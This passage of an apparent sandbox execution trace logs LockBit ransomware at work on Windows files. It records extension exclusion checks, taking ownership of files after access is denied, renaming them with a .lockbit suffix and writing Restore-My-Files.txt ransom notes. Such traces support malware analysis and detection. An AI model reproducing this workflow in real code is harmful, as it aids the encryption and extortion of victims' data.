lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0087.609] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0087.610] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0087.610] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ea-sym.xml") returned 1 [0087.610] lstrcmpiW (lpString1="ntldr", lpString2="ea-sym.xml") returned 1 [0087.610] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ea-sym.xml") returned 1 [0087.610] lstrcmpiW (lpString1="bootsect.bak", lpString2="ea-sym.xml") returned -1 [0087.610] lstrcmpiW (lpString1="autorun.inf", lpString2="ea-sym.xml") returned -1 [0087.610] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\") returned="" [0087.610] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned=".xml" [0087.610] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0087.610] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0087.610] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0087.611] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0087.611] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit") returned 92 [0087.611] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0087.612] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit")) returned 0 [0087.612] GetLastError () returned 0x5 [0087.612] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0087.612] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0087.612] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.613] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0087.613] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0087.613] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0087.614] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0087.614] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0087.624] NtClose (Handle=0x3b0) returned 0x0 [0087.753] RtlFreeAnsiString (AnsiString="\\") [0087.753] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0087.753] malloc (_Size=0x200) returned 0x53fcc0 [0087.753] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0087.753] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0087.753] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0087.753] CloseHandle (hObject=0x3b0) returned 1 [0087.753] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0087.754] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0087.754] free (_Block=0x53fcc0) [0087.754] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0087.754] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit")) returned 1 [0087.755] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0087.755] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0087.755] malloc (_Size=0x40068) returned 0x206b860 [0087.755] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=749) returned 1 [0087.755] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0087.950] GetLastError () returned 0x3e5 [0087.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 1 [0087.950] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt") returned 94 [0087.951] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.952] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0087.952] malloc (_Size=0x40068) returned 0x20abae0 [0087.952] WriteFile (in: hFile=0x3c4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0087.954] GetLastError () returned 0x3e5 [0087.954] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0087.954] lstrcmpiW (lpString1=".", lpString2="ja-jp-sym.xml") returned -1 [0087.954] lstrcmpiW (lpString1="..", lpString2="ja-jp-sym.xml") returned -1 [0087.954] PathFindExtensionW (pszPath="ja-jp-sym.xml") returned=".xml" [0087.954] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0087.954] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0087.954] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0087.954] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0087.955] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0087.956] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0087.956] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0087.956] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ja-jp-sym.xml") returned 1 [0087.956] lstrcmpiW (lpString1="ntldr", lpString2="ja-jp-sym.xml") returned 1 [0087.956] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ja-jp-sym.xml") returned 1 [0087.956] lstrcmpiW (lpString1="bootsect.bak", lpString2="ja-jp-sym.xml") returned -1 [0087.957] lstrcmpiW (lpString1="autorun.inf", lpString2="ja-jp-sym.xml") returned -1 [0087.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\") returned="" [0087.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned=".xml" [0087.957] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0087.957] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0087.957] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0087.958] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0087.958] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit") returned 95 [0087.958] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0087.958] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit")) returned 0 [0088.018] GetLastError () returned 0x5 [0088.018] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0088.018] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0088.018] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.019] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0088.019] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0088.019] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0088.020] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0088.020] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0088.094] NtClose (Handle=0x3b0) returned 0x0 [0088.095] RtlFreeAnsiString (AnsiString="\\") [0088.095] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0088.095] malloc (_Size=0x200) returned 0x53fcc0 [0088.095] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0088.095] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0088.095] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0088.095] CloseHandle (hObject=0x3b0) returned 1 [0088.095] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0088.095] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0088.096] free (_Block=0x53fcc0) [0088.096] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0088.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit")) returned 1 [0088.096] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0088.097] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0088.097] malloc (_Size=0x40068) returned 0x206b860 [0088.097] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=749) returned 1 [0088.097] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0088.128] GetLastError () returned 0x3e5 [0088.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 1 [0088.128] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt") returned 94 [0088.128] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.128] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0088.128] lstrcmpiW (lpString1=".", lpString2="symbase.xml") returned -1 [0088.128] lstrcmpiW (lpString1="..", lpString2="symbase.xml") returned -1 [0088.128] PathFindExtensionW (pszPath="symbase.xml") returned=".xml" [0088.128] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0088.128] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0088.128] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0088.128] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0088.128] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".nls", lpString2=".xml") 